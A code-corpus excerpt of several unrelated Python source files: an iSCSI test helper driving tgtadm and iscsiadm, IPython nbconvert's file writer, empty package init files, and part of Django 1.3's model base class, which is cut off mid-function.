pattern = r"Target:\s+%s.*?disk\s(\w+)\s+\S+\srunning" % self.target
device_name = re.findall(pattern, output, re.S)
try:
device_name = "/dev/%s" % device_name[0]
except IndexError:
logging.error("Can not find target '%s' after login.", self.target)
else:
logging.error("Session is not logged in yet.")
return device_name
def get_target_id(self):
"""
Get target id from image name. Only works for emulated iscsi device
"""
cmd = "tgtadm --lld iscsi --mode target --op show"
target_info = utils.system_output(cmd)
target_id = ""
for line in re.split("\n", target_info):
if re.findall("Target\s+(\d+)", line):
target_id = re.findall("Target\s+(\d+)", line)[0]
if re.findall("Backing store path:\s+(/+.+)", line):
if self.emulated_image in line:
break
else:
target_id = ""
return target_id
def get_chap_accounts(self):
"""
Get all CHAP authentication accounts
"""
cmd = "tgtadm --lld iscsi --op show --mode account"
all_accounts = utils.system_output(cmd)
if all_accounts:
all_accounts = map(str.strip, all_accounts.splitlines()[1:])
return all_accounts
def add_chap_account(self):
"""
Add CHAP authentication account
"""
try:
cmd = "tgtadm --lld iscsi --op new --mode account"
cmd += " --user %s" % self.chap_user
cmd += " --password %s" % self.chap_passwd
utils.system(cmd)
except error.CmdError, err:
logging.error("Fail to add account: %s", err)
# Check the new add account exist
if self.chap_user not in self.get_chap_accounts():
logging.error("Can't find account %s" % self.chap_user)
def delete_chap_account(self):
"""
Delete the CHAP authentication account
"""
if self.chap_user in self.get_chap_accounts():
cmd = "tgtadm --lld iscsi --op delete --mode account"
cmd += " --user %s" % self.chap_user
utils.system(cmd)
def get_target_account_info(self):
"""
Get the target account information
"""
cmd = "tgtadm --lld iscsi --mode target --op show"
target_info = utils.system_output(cmd)
pattern = r"Target\s+\d:\s+%s" % self.target
pattern += ".*Account information:\s(.*)ACL information"
try:
target_account = re.findall(pattern, target_info,
re.S)[0].strip().splitlines()
except IndexError:
target_account = []
return map(str.strip, target_account)
def set_chap_auth_target(self):
"""
Set CHAP authentication on a target, it will require authentication
before an initiator is allowed to log in and access devices.
"""
if self.chap_user not in self.get_chap_accounts():
self.add_chap_account()
if self.chap_user in self.get_target_account_info():
logging.debug("Target %s already has account %s", self.target,
self.chap_user)
else:
cmd = "tgtadm --lld iscsi --op bind --mode account"
cmd += " --tid %s --user %s" % (self.emulated_id, self.chap_user)
utils.system(cmd)
def set_chap_auth_initiator(self):
"""
Set CHAP authentication for initiator.
"""
name_dict = {'node.session.auth.authmethod': 'CHAP'}
name_dict['node.session.auth.username'] = self.chap_user
name_dict['node.session.auth.password'] = self.chap_passwd
for name in name_dict.keys():
cmd = "iscsiadm --mode node --targetname %s " % self.target
cmd += "--op update --name %s --value %s" % (name, name_dict[name])
try:
utils.system(cmd)
except error.CmdError:
logging.error("Fail to set CHAP authentication for initiator")
def export_target(self):
"""
Export target in localhost for emulated iscsi
"""
selinux_mode = None
if not os.path.isfile(self.emulated_image):
utils.system(self.create_cmd)
else:
emulated_image_size = os.path.getsize(self.emulated_image) / 1024
if emulated_image_size != self.emulated_expect_size:
# No need to remvoe, rebuild is fine
utils.system(self.create_cmd)
cmd = "tgtadm --lld iscsi --mode target --op show"
try:
output = utils.system_output(cmd)
except error.CmdError:
utils.system("service tgtd restart")
output = utils.system_output(cmd)
if not re.findall("%s$" % self.target, output, re.M):
logging.debug("Need to export target in host")
# Set selinux to permissive mode to make sure iscsi target
# export successfully
if utils_selinux.is_enforcing():
selinux_mode = utils_selinux.get_status()
utils_selinux.set_status("permissive")
output = utils.system_output(cmd)
used_id = re.findall("Target\s+(\d+)", output)
emulated_id = 1
while str(emulated_id) in used_id:
emulated_id += 1
self.emulated_id = str(emulated_id)
cmd = "tgtadm --mode target --op new --tid %s" % self.emulated_id
cmd += " --lld iscsi --targetname %s" % self.target
utils.system(cmd)
cmd = "tgtadm --lld iscsi --op bind --mode target "
cmd += "--tid %s -I ALL" % self.emulated_id
utils.system(cmd)
else:
target_strs = re.findall("Target\s+(\d+):\s+%s$" %
self.target, output, re.M)
self.emulated_id = target_strs[0].split(':')[0].split()[-1]
cmd = "tgtadm --lld iscsi --mode target --op show"
try:
output = utils.system_output(cmd)
except error.CmdError: # In case service stopped
utils.system("service tgtd restart")
output = utils.system_output(cmd)
# Create a LUN with emulated image
if re.findall(self.emulated_image, output, re.M):
# Exist already
logging.debug("Exported image already exists.")
self.export_flag = True
else:
tgt_str = re.search(r'.*(Target\s+\d+:\s+%s\s*.*)$' % self.target,
output, re.DOTALL)
if tgt_str:
luns = len(re.findall("\s+LUN:\s(\d+)",
tgt_str.group(1), re.M))
else:
luns = len(re.findall("\s+LUN:\s(\d+)", output, re.M))
cmd = "tgtadm --mode logicalunit --op new "
cmd += "--tid %s --lld iscsi " % self.emulated_id
cmd += "--lun %s " % luns
cmd += "--backing-store %s" % self.emulated_image
utils.system(cmd)
self.export_flag = True
# Restore selinux
if selinux_mode is not None:
utils_selinux.set_status(selinux_mode)
if self.chap_flag:
# Set CHAP authentication on the exported target
self.set_chap_auth_target()
# Set CHAP authentication for initiator to login target
if self.portal_visible():
self.set_chap_auth_initiator()
def delete_target(self):
"""
Delete target from host.
"""
cmd = "tgtadm --lld iscsi --mode target --op show"
output = utils.system_output(cmd)
if re.findall("%s$" % self.target, output, re.M):
if self.emulated_id:
cmd = "tgtadm --lld iscsi --mode target --op delete "
cmd += "--tid %s" % self.emulated_id
utils.system(cmd)
def logout(self):
"""
Logout from target.
"""
if self.logged_in():
iscsi_logout(self.target)
def cleanup(self):
"""
Clean up env after iscsi used.
"""
self.logout()
if os.path.isfile("/etc/iscsi/initiatorname.iscsi-%s" % self.id):
cmd = " mv /etc/iscsi/initiatorname.iscsi-%s" % self.id
cmd += " /etc/iscsi/initiatorname.iscsi"
utils.system(cmd)
cmd = "service iscsid restart"
utils.system(cmd)
if self.export_flag:
self.delete_target()
|
WillisXChen/django-oscar | refs/heads/master | oscar/lib/python2.7/site-packages/IPython/nbconvert/writers/files.py | 7 | """
Contains writer for writing nbconvert output to filesystem.
"""
#-----------------------------------------------------------------------------
#Copyright (c) 2013, the IPython Development Team.
#
#Distributed under the terms of the Modified BSD License.
#
#The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import io
import os
import glob
from IPython.utils.traitlets import Unicode
from IPython.utils.path import link_or_copy
from .base import WriterBase
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class FilesWriter(WriterBase):
"""Consumes nbconvert output and produces files."""
build_directory = Unicode("", config=True,
help="""Directory to write output to. Leave blank
to output to the current directory""")
# Make sure that the output directory exists.
def _build_directory_changed(self, name, old, new):
if new and not os.path.isdir(new):
os.makedirs(new)
def __init__(self, **kw):
super(FilesWriter, self).__init__(**kw)
self._build_directory_changed('build_directory', self.build_directory,
self.build_directory)
def _makedir(self, path):
"""Make a directory if it doesn't already exist"""
if path and not os.path.isdir(path):
self.log.info("Making directory %s", path)
os.makedirs(path)
def write(self, output, resources, notebook_name=None, **kw):
"""
Consume and write Jinja output to the file system. Output directory
is set via the 'build_directory' variable of this instance (a
configurable).
See base for more...
"""
# Verify that a notebook name is provided.
if notebook_name is None:
raise TypeError('notebook_name')
# Pull the extension and subdir from the resources dict.
output_extension = resources.get('output_extension', None)
# Write all of the extracted resources to the destination directory.
# NOTE: WE WRITE EVERYTHING AS-IF IT'S BINARY. THE EXTRACT FIG
# PREPROCESSOR SHOULD HANDLE UNIX/WINDOWS LINE ENDINGS...
for filename, data in resources.get('outputs', {}).items():
# Determine where to write the file to
dest = os.path.join(self.build_directory, filename)
path = os.path.dirname(dest)
self._makedir(path)
# Write file
self.log.debug("Writing %i bytes to support file %s", len(data), dest)
with io.open(dest, 'wb') as f:
f.write(data)
# Copy referenced files to output directory
if self.build_directory:
for filename in self.files:
# Copy files that match search pattern
for matching_filename in glob.glob(filename):
# Make sure folder exists.
dest = os.path.join(self.build_directory, filename)
path = os.path.dirname(dest)
self._makedir(path)
# Copy if destination is different.
if not os.path.normpath(dest) == os.path.normpath(matching_filename):
self.log.info("Linking %s -> %s", matching_filename, dest)
link_or_copy(matching_filename, dest)
# Determine where to write conversion results.
if output_extension is not None:
dest = notebook_name + '.' + output_extension
else:
dest = notebook_name
if self.build_directory:
dest = os.path.join(self.build_directory, dest)
# Write conversion results.
self.log.info("Writing %i bytes to %s", len(output), dest)
with io.open(dest, 'w', encoding='utf-8') as f:
f.write(output)
return dest
|
ajaali/django | refs/heads/master | django/conf/locale/fi/__init__.py | 12133432 | |
devassistant/devassistant | refs/heads/master | test/integration/__init__.py | 12133432 | |
homeworkprod/byceps | refs/heads/master | tests/util/iterables/__init__.py | 12133432 | |
fernandog/Medusa | refs/heads/optimized | ext/future/backports/email/mime/__init__.py | 12133432 | |
ThunderShiviah/code_guild | refs/heads/master | wk2/extras/linked_lists/add_reverse/__init__.py | 12133432 | |
thehyve/variant | refs/heads/master | eggs/django-1.3.1-py2.7.egg/django/db/models/base.py | 55 | import types
import sys
from itertools import izip
import django.db.models.manager # Imported to register signal handler.
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned, FieldError, ValidationError, NON_FIELD_ERRORS
from django.core import validators
from django.db.models.fields import AutoField, FieldDoesNotExist
from django.db.models.fields.related import (OneToOneRel, ManyToOneRel,
OneToOneField, add_lazy_relation)
from django.db.models.query import Q
from django.db.models.query_utils import DeferredAttribute
from django.db.models.deletion import Collector
from django.db.models.options import Options
from django.db import (connections, router, transaction, DatabaseError,
DEFAULT_DB_ALIAS)
from django.db.models import signals
from django.db.models.loading import register_models, get_model
from django.utils.translation import ugettext_lazy as _
import django.utils.copycompat as copy
from django.utils.functional import curry, update_wrapper
from django.utils.encoding import smart_str, force_unicode
from django.utils.text import get_text_list, capfirst
from django.conf import settings
class ModelBase(type):
"""
Metaclass for all models.
"""
def __new__(cls, name, bases, attrs):
super_new = super(ModelBase, cls).__new__
parents = [b for b in bases if isinstance(b, ModelBase)]
if not parents:
# If this isn't a subclass of Model, don't do anything special.
return super_new(cls, name, bases, attrs)
# Create the class.
module = attrs.pop('__module__')
new_class = super_new(cls, name, bases, {'__module__': module})
attr_meta = attrs.pop('Meta', None)
abstract = getattr(attr_meta, 'abstract', False)
if not attr_meta:
meta = getattr(new_class, 'Meta', None)
else:
meta = attr_meta
base_meta = getattr(new_class, '_meta', None)
if getattr(meta, 'app_label', None) is None:
# Figure out the app_label by looking one level up.
# For 'django.contrib.sites.models', this would be 'sites'.
model_module = sys.modules[new_class.__module__]
kwargs = {"app_label": model_module.__name__.split('.')[-2]}
else:
kwargs = {}
new_class.add_to_class('_meta', Options(meta, **kwargs))
if not abstract:
new_class.add_to_class('DoesNotExist', subclass_exception('DoesNotExist',
tuple(x.DoesNotExist
for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
or (ObjectDoesNotExist,), module))
new_class.add_to_class('MultipleObjectsReturned', subclass_exception('MultipleObjectsReturned',
tuple(x.MultipleObjectsReturned
for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
or (MultipleObjectsReturned,), module))
if base_meta and not base_meta.abstract:
# Non-abstract child classes inherit some attributes from their
# non-abstract parent (unless an ABC comes before it in the
# method resolution order).
if not hasattr(meta, 'ordering'):
new_class._meta.ordering = base_meta.ordering
if not hasattr(meta, 'get_latest_by'):
new_class._meta.get_latest_by = base_meta.get_latest_by
is_proxy = new_class._meta.proxy
if getattr(new_class, '_default_manager', None):
if not is_proxy:
# Multi-table inheritance doesn't inherit default manager from
# parents.
new_class._default_manager = None
new_class._base_manager = None
else:
# Proxy classes do inherit parent's default manager, if none is
# set explicitly.
new_class._default_manager = new_class._default_manager._copy_to_model(new_class)
new_class._base_manager = new_class._base_manager._copy_to_model(new_class)
# Bail out early if we have already created this class.
m = get_model(new_class._meta.app_label, name, False)
if m is not None:
return m
# Add all attributes to the class.
for obj_name, obj in attrs.items():
new_class.add_to_class(obj_name, obj)
# All the fields of any type declared on this model
new_fields = new_class._meta.local_fields + \
new_class._meta.local_many_to_many + \
new_class._meta.virtual_fields
field_names = set([f.name for f in new_fields])
# Basic setup for proxy models.
if is_proxy:
base = None
for parent in [cls for cls in parents if hasattr(cls, '_meta')]:
if parent._meta.abstract:
if parent._meta.fields:
raise TypeError("Abstract base class containing model fields not permitted for proxy model '%s'." % name)
else:
continue
if base is not None:
raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
else:
base = parent
if base is None:
raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
if (new_class._meta.local_fields or
new_class._meta.local_many_to_many):
raise FieldError("Proxy model '%s' contains model fields." % name)
while base._meta.proxy:
base = base._meta.proxy_for_model
new_class._meta.setup_proxy(base)
# Do the appropriate setup for any model parents.
o2o_map = dict([(f.rel.to, f) for f in new_class._meta.local_fields
if isinstance(f, OneToOneField)])
for base in parents:
original_base = base
if not hasattr(base, '_meta'):
# Things without _meta aren't functional models, so they're
# uninteresting parents.
continue
parent_fields = base._meta.local_fields + base._meta.local_many_to_many
# Check for clashes between locally declared fields and those
# on the base classes (we cannot handle shadowed fields at the
# moment).
for field in parent_fields:
if field.name in field_names:
raise FieldError('Local field %r in class %r clashes '
'with field of similar name from '
'base class %r' %
(field.name, name, base.__name__))
if not base._meta.abstract:
# Concrete classes...
while base._meta.proxy:
# Skip over a proxy class to the "real" base it proxies.
base = base._meta.proxy_for_model
if base in o2o_map:
field = o2o_map[base]
elif not is_proxy:
attr_name = '%s_ptr' % base._meta.module_name
field = OneToOneField(base, name=attr_name,
auto_created=True, parent_link=True)
new_class.add_to_class(attr_name, field)
else:
field = None
new_class._meta.parents[base] = field
else:
# .. and abstract ones.
for field in parent_fields:
new_class.add_to_class(field.name, copy.deepcopy(field))
# Pass any non-abstract parent classes onto child.
new_class._meta.parents.update(base._meta.parents)
# Inherit managers from the abstract base classes.
new_class.copy_managers(base._meta.abstract_managers)
# Proxy models inherit the non-abstract managers from their base,
# unless they have redefined any of them.
if is_proxy:
new_class.copy_managers(original_base._meta.concrete_managers)
# Inherit virtual fields (like GenericForeignKey) from the parent
# class
for field in base._meta.virtual_fields:
if base._meta.abstract and field.name in field_names:
raise FieldError('Local field %r in class %r clashes '\
'with field of similar name from '\
'abstract base class %r' % \
(field.name, name, base.__name__))
new_class.add_to_class(field.name, copy.deepcopy(field))
if abstract:
# Abstract base models can't be instantiated and don't appear in
# the list of models for an app. We do the final setup for them a
# little differently from normal models.
attr_meta.abstract = False
new_class.Meta = attr_meta
return new_class
new_class._prepare()
register_models(new_class._meta.app_label, new_class)
# Because of the way imports happen (recursively), we may or may not be
# the first time this model tries to register with the framework. There
# should only be one class for each model, so we always return the
# registered version.
return get_model(new_class._meta.app_label, name, False)
def copy_managers(cls, base_managers):
# This is in-place sorting of an Options attribute, but that's fine.
base_managers.sort()
for _, mgr_name, manager in base_managers:
val = getattr(cls, mgr_name, None)
if not val or val is manager:
new_manager = manager._copy_to_model(cls)
cls.add_to_class(mgr_name, new_manager)
def add_to_class(cls, name, value):
if hasattr(value, 'contribute_to_class'):
value.contribute_to_class(cls, name)
else:
setattr(cls, name, value)
def _prepare(cls):
"""
Creates some methods once self._meta has been populated.
"""
opts = cls._meta
opts._prepare(cls)
if opts.order_with_respect_to:
cls.get_next_in_order = curry(cls._get_next_or_previous_in_order, is_next=True)
cls.get_previous_in_order = curry(cls._get_next_or_previous_in_order, is_next=False)
# defer creating accessors on the foreign class until we are
# certain it has been created
def make_foreign_order_accessors(field, model, cls):
setattr(
field.rel.to,
'get_%s_order' % cls.__name__.lower(),
curry(method_get_order, cls)
)
setattr(
field.rel.to,
'set_%s_order' % cls.__name__.lower(),
curry(method_set_order, cls)
)
add_lazy_relation(
cls,
opts.order_with_respect_to,
opts.order_with_respect_to.rel.to,
make_foreign_order_accessors
)
# Give the class a docstring -- its definition.
if cls.__doc__ is None:
cls.__doc__ = "%s(%s)" % (cls.__name__, ", ".join([f.attname for f in opts.fields]))
if hasattr(cls, 'get_absolute_url'):
cls.get_absolute_url = update_wrapper(curry(get_absolute_url, opts, cls.get_absolute_url),
cls.get_absolute_url)
signals.class_prepared.send(sender=cls)
class ModelState(object):
"""
A class for storing instance state
"""
def __init__(self, db=None):
self.db = db
# If true, uniqueness validation checks will consider this a new, as-yet-unsaved object.
# Necessary for correct validation of new instances of objects with explicit (non-auto) PKs.
# This impacts validation only; it has no effect on the actual save.
self.adding = True
class Model(object):
__metaclass__ = ModelBase
_deferred = False
def __init__(self, *args, **kwargs):
signals.pre_init.send(sender=self.__class__, args=args, kwargs=kwargs)
# Set up the storage for instance state
self._state = ModelState()
# There is a rather weird disparity here; if kwargs, it's set, then args
# overrides it. It should be one or the other; don't duplicate the work
# The reason for the kwargs check is that standard iterator passes in by
# args, and instantiation for iteration is 33% faster.
args_len = len(args)
if args_len > len(self._meta.fields):
# Daft, but matches old exception sans the err msg.
raise IndexError("Number of args exceeds number of fields")
fields_iter = iter(self._meta.fields)
if not kwargs:
# The ordering of the izip calls matter - izip throws StopIteration
# when an iter throws it. So if the first iter throws it, the second
# is *not* consumed. We rely on this, so don't change the order
# without changing the logic.
for val, field in izip(args, fields_iter):
setattr(self, field.attname, val)
else:
# Slower, kwargs-ready version.
for val, field in izip(args, fields_iter):
setattr(self, field.attname, val)
kwargs.pop(field.name, None)
# Maintain compatibility with existing calls.
if isinstance(field.rel, ManyToOneRel):
kwargs.pop(field.attname, None)
# Now we're left with the unprocessed fields that *must* come from
# keywords, or default.
for field in fields_iter:
is_related_object = False
# This slightly odd construct is so that we can access any
# data-descriptor object (DeferredAttribute) without triggering its
# __get__ method.
if (field.attname not in kwargs and
isinstance(self.__class__.__dict__.get(field.attname), DeferredAttribute)):
# This field will be populated on request.
continue
if kwargs:
if isinstance(field.rel, ManyToOneRel):
try:
# Assume object instance was passed in.
rel_obj = kwargs.pop(field.name)
is_related_object = True
except KeyError:
try:
# Object instance wasn't passed in -- must be an ID.
val = kwargs.pop(field.attname)
except KeyError:
val = field.get_default()
else:
# Object instance was passed in. Special case: You can
# pass in "None" for related objects if it's allowed.
if rel_obj is None and field.null:
val = None
else:
try:
val = kwargs.pop(field.attname)
except KeyError:
# This is done with an exception rather than the
# default argument on pop because we don't want
# get_default() to be evaluated, and then not used.
# Refs #12057.
val = field.get_default()
else:
val = field.get_default()
if is_related_object:
# If we are passed a related instance, set it using the
# field.name instead of field.attname (e.g. "user" instead of
# "user_id") so that the object gets properly cached (and type
# checked) by the RelatedObjectDescriptor.
setattr(self, field.name, rel_obj)
else:
setattr(self, field.attname, val)
if kwargs:
for prop in kwargs.keys():
try:
if isinstance(getattr(self.__class__, prop), property):
setattr(self, prop, kwargs.pop(prop))
except AttributeError:
pass
if kwargs:
raise TypeError("'%s' is an invalid keyword argument for this function" % kwargs.keys()[0])
super(Model, self).__init__()
signals.post_init.send(sender=self.__class__, instance=self)
def __repr__(self):
try:
u = unicode(self)
except (UnicodeEncodeError, UnicodeDecodeError):
u = '[Bad Unicode data]'
return smart_str(u'<%s: %s>' % (self.__class__.__name__, u))
def __str__(self):
if hasattr(self, '__unicode__'):
return force_unicode(self).encode('utf-8')
return '%s object' % self.__class__.__name__
def __eq__(self, other):
return isinstance(other, self.__class__) and self._get_pk_val() == other._get_pk_val()
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self._get_pk_val())
def __reduce__(self):
"""
Provide pickling support. Normally, this just dispatches to Python's
standard handling. However, for models with deferred field loading, we
need to do things manually, as they're dynamically created classes and
only module-level classes can be pickled by the default path.
"""
data = self.__dict__
model = self.__class__
# The obvious thing to do here is to invoke super().__reduce__()
# for the non-deferred case. Don't do that.
# On Python 2.4, there is something weird with __reduce__,
# and as a result, the super call will cause an infinite recursion.
# See #10547 and #12121.
defers = []
pk_val = None
if self._deferred:
from django.db.models.query_utils import deferred_class_factory
factory = deferred_class_factory
for field in self._meta.fields:
if isinstance(self.__class__.__dict__.get(field.attname),
DeferredAttribute):
defers.append(field.attname)
if pk_val is None:
# The pk_val and model values are the same for all
# DeferredAttribute classes, so we only need to do this
# once.
obj = self.__class__.__dict__[field.attname]
model = obj.model_ref()
else:
factory = simple_class_factory
return (model_unpickle, (model, defers, factory), data)
def _get_pk_val(self, meta=None):
if not meta:
meta = self._meta
return getattr(self, meta.pk.attname)
def _set_pk_val(self, value):
return setattr(self, self._meta.pk.attname, value)
pk = property(_get_pk_val, _set_pk_val)
def serializable_value(self, field_name):
"""
Returns the value of the field name for this instance. If the field is
a foreign key, returns the id value, instead of the object. If there's
no Field object with this name on the model, the model attribute's
value is returned directly.
Used to serialize a field's value (in the serializer, or form output,
for example). Normally, you would just access the attribute directly
and not use this method.
"""
try:
field = self._meta.get_field_by_name(field_name)[0]
except FieldDoesNotExist:
return getattr(self, field_name)
return getattr(self, field.attname)
def save(self, force_insert=False, force_update=False, using=None):
"""
Saves the current instance. Override this in a subclass if you want to
control the saving process.
The 'force_insert' and 'force_update' parameters can be used to insist
that the "save" must be an SQL insert or update (or equivalent for
non-SQL backends), respectively. Normally, they should not be set.
"""
if force_insert and force_update:
raise ValueError("Cannot force both insert and updating in model saving.")
self.save_base(using=using, force_insert=force_insert, force_update=force_update)
save.alters_data = True
def save_base(self, raw=False, cls=None, origin=None, force_insert=False,
force_update=False, using=None):
"""
Does the heavy-lifting involved in saving. Subclasses shouldn't need to
override this method. It's separate from save() in order to hide the
need for overrides of save() to pass around internal-only parameters
('raw', 'cls', and 'origin').
"""
using = using or router.db_for_write(self.__class__, instance=self)
connection = connections[using]
assert not (force_insert and force_update)
if cls is None:
cls = self.__class__
meta = cls._meta
if not meta.proxy:
origin = cls
else:
meta = cls._meta
if origin and not meta.auto_created:
signals.pre_save.send(sender=origin, instance=self, raw=raw, using=using)
# If we are in a raw save, save the object exactly as presented.
# That means that we don't try to be smart about saving attributes
# that might have come from the parent class - we just save the
# attributes we have been given to the class we have been given.
# We also go through this process to defer the save of proxy objects
# to their actual underlying model.
if not raw or meta.proxy:
if meta.proxy:
org = cls
else:
org = None
for parent, field in meta.parents.items():
# At this point, parent's primary key field may be unknown
# (for example, from administration form which doesn't fill
# this field). If so, fill it.
if field and getattr(self, parent._meta.pk.attname) is None and getattr(self, field.attname) is not None:
setattr(self, parent._meta.pk.attname, getattr(self, field.attname))
self.save_base(cls=parent, origin=org, using=using)
if field:
setattr(self, field.attname, self._get_pk_val(parent._meta))
if meta.proxy:
return
if not meta.proxy:
non_pks = [f for f in meta.local_fields if not f.primary_key]
# First, try an UPDATE. If that doesn't update anything, do an INSERT.
pk_val = self._get_pk_val(meta)
pk_set = pk_val is not None
record_exists = True
manager = cls._base_manager
if pk_set:
# Determine whether a record with the primary key already exists.
if (force_update or (not force_insert and
manager.using(using).filter(pk=pk_val).exists())):
# It does already exist, so do an UPDATE.
if force_update or non_pks:
values = [(f, None, (raw and getattr(self, f.attname) or f.pre_save(self, False))) for f in non_pks]
rows = manager.using(using).filter(pk=pk_val)._update(values)
if force_update and not rows:
raise DatabaseError("Forced update did not affect any rows.")
else:
record_exists = False
if not pk_set or not record_exists:
if meta.order_with_respect_to:
# If this is a model with an order_with_respect_to
# autopopulate the _order field
field = meta.order_with_respect_to
order_value = manager.using(using).filter(**{field.name: getattr(self, field.attname)}).count()
self._order = order_value
if not pk_set:
if force_update:
raise ValueError("Cannot force an update in save() with no primary key.")
values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, True), connection=connection))
for f in meta.local_fields if not isinstance(f, AutoField)]
else:
values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, True), connection=connection))
for f in meta.local_fields]
record_exists = False
update_pk = bool(meta.has_auto_field and not pk_set)
if values:
# Create a new record.
result = manager._insert(values, return_id=update_pk, using=using)
else:
# Create a new record with defaults for everything.
result = manager._insert([(meta.pk, connection.ops.pk_default_value())], return_id=update_pk, raw_values=True, using=using)
if update_pk:
setattr(self, meta.pk.attname, result)
transaction.commit_unless_managed(using=using)
# Store the database on which the object was saved
self._state.db = using
# Once saved, this is no longer a to-be-added instance.
self._state.adding = False
# Signal that the save is complete
if origin and not meta.auto_created:
signals.post_save.send(sender=origin, instance=self,
created=(not record_exists), raw=raw, using=using)
save_base.alters_data = True
def delete(self, using=None):
using = using or router.db_for_write(self.__class__, instance=self)
assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." % (self._meta.object_name, self._meta.pk.attname)
collector = Collector(using=using)
collector.collect([self])
collector.delete()
delete.alters_data = True
def _get_FIELD_display(self, field):
value = getattr(self, field.attname)
return force_unicode(dict(field.flatchoices).get(value, value), strings_only=True)
def _get_next_or_previous_by_FIELD(self, field, is_next, **kwargs):
if not self.pk:
raise ValueError("get_next/get_previous cannot be used on unsaved objects.")
op = is_next and 'gt' or 'lt'
order = not is_next and '-' or ''
param = smart_str(getattr(self, field.attname))
q = Q(**{'%s__%s' % (field.name, op): param})
q = q|Q(**{field.name: param, 'pk__%s' % op: self.pk})
qs = self.__class__._default_manager.using(self._state.db).filter(**kwargs).filter(q).order_by('%s%s' % (order, field.name), '%spk' % order)
try:
return qs[0]
except IndexError:
raise self.DoesNotExist("%s matching query does not exist." % self.__class__._meta.object_name)
def _get_next_or_previous_in_order(self, is_next):
cachename = "__%s_order_cache" % is_next
if not hasattr(self, cachename):
op = is_next and 'gt' or 'lt'
order = not is_next and '-_order' or '_order'
order_field = self._meta.order_with_respect_to
obj = self._default_manager.filter(**{
order_field.name: getattr(self, order_field.attname)
}).filter(**{
'_order__%s' % op: self._default_manager.values('_order').filter(**{
self._meta.pk.name: self.pk
})
}).order_by(order)[:1].get()
setattr(self, cachename, obj)
return getattr(self, cachename)
def prepare_database_save(self, unused):
return self.pk
def clean(self):
"""
Hook for doing any extra model-wide validation after clean() has been
called on every field by self.clean_fields. Any ValidationError raised
by this method will not be associated with a particular field; it will
have a special-case association with the field defined by NON_FIELD_ERRORS.
"""
pass
def validate_unique(self, exclude=None):
"""
Checks unique constraints on the model and raises ``ValidationError``
if any failed.
"""
unique_checks, date_checks = self._get_unique_checks(exclude=exclude)
errors = self._perform_unique_checks(unique_checks)
date_errors = self._perform_date_checks(date_checks)
for k, v in date_errors.items():
errors.setdefault(k, []).extend(v)
if errors:
raise ValidationError(errors)
def _get_unique_checks(self, exclude=None):
"""
Gather a list of checks to perform. Since validate_unique could be
called from a ModelForm, some fields may have been excluded; we can't
perform a unique check on a model that is missing fields involved
in that check.
Fields that did not validate should also be excluded, but they need
to be passed in via the exclude argument.
"""
if exclude is None:
exclude = []
unique_checks = []
unique_togethers = [(self.__class__, self._meta.unique_together)]
for parent_class in self._meta.parents.keys():
if parent_class._meta.unique_together:
unique_togethers.append((parent_class, parent_class._meta.unique_together))
for model_class, unique_together in unique_togethers:
for check in unique_together:
for name in check:
# If this is an excluded field, don't add this check.
if name in exclude:
break
else:
unique_checks.append((model_class, tuple(check)))
# These are checks for the unique_for_<date/year/month>.
date_checks = []
# Gather a list of checks for fields declared as unique and add them to
# the list of checks.
fields_with_class = [(self.__class__, self._meta.local_fields)]
for parent_class in self._meta.parents.keys():
fields_with_class.append((parent_class, parent_class._meta.local_fields))
for model_class, fields in fields_with_class:
for f in fields:
name = f.name
if name in exclude:
continue
if f.unique:
unique_checks.append((model_class, (name,)))
if f.unique_for_date and f.unique_for_date not in exclude:
date_checks.append((model_class, 'date', name, f.unique_for_date))
if f.unique_for_year and f.unique_for_year not in exclude:
date_checks.append((model_class, 'year', name, f.unique_for_year))
if f.unique_for_month and f.unique_for_month not in exclude:
date_checks.append((model_class, 'month', name, f.unique_for_month))
return unique_checks, date_checks
def _perform_unique_checks(self, unique_checks):
errors = {}
for model_class, unique_check in unique_checks:
# Try to look up an existing object with the same values as this
# object's values for all the unique field.
lookup_kwargs = {}
for field_name in unique_check:
f = self._meta.get_field(field_name)
lookup_value = getattr(self, f.attname)
if lookup_value is None:
# no value, skip the lookup
continue
if f.primary_key and not self._state.adding:
# no need to check for unique primary key when editing
continue
lookup_kwargs[str(field_name)] = lookup_value
# some fields were skipped, no reason to do the check
if len(unique_check) != len(lookup_kwargs.keys()):
continue
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
if len(unique_check) == 1:
key = unique_check[0]
else:
key = NON_FIELD_ERRORS
errors.setdefault(key, []).append(self.unique_error_message(model_class, unique_check))
return errors
def _perform_date_checks(self, date_checks):
errors = {}
for model_class, lookup_type, field, unique_for in date_checks:
lookup_kwargs = {}
# there's a ticket to add a date lookup, we can remove this special
# case if that makes it's way in
date = getattr(self, unique_for)
if date is None:
continue
if lookup_type == 'date':
lookup_kwargs['%s__day' % unique_for] = date.day
lookup_kwargs['%s__month' % unique_for] = date.month
lookup_kwargs['%s__year' % unique_for] = date.year
else:
lookup_kwargs['%s__%s' % (unique_for, lookup_type)] = getattr(date, lookup_type)
lookup_kwargs[field] = getattr(self, field)
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
errors.setdefault(field, []).append(
self.date_error_message(lookup_type, field, unique_for)
)
return errors
def date_error_message(self, lookup_type, field, unique_for):
opts = self._meta
return _(u"%(field_name)s must be unique for %(date_field)s %(lookup)s.") % {
'field_name': unicode(capfirst(opts.get_field(field).verbose_name)),
'date_field': unicode(capfirst(opts.get_field(unique_for).verbose_name)),
'lookup': lookup_type,
}
def unique_error_message(self, model_class, unique_check):
opts = model_class._meta
model_name = capfirst(opts.verbose_name)
# A unique field
if len(unique_check) == 1:
field_name = unique_check[0]
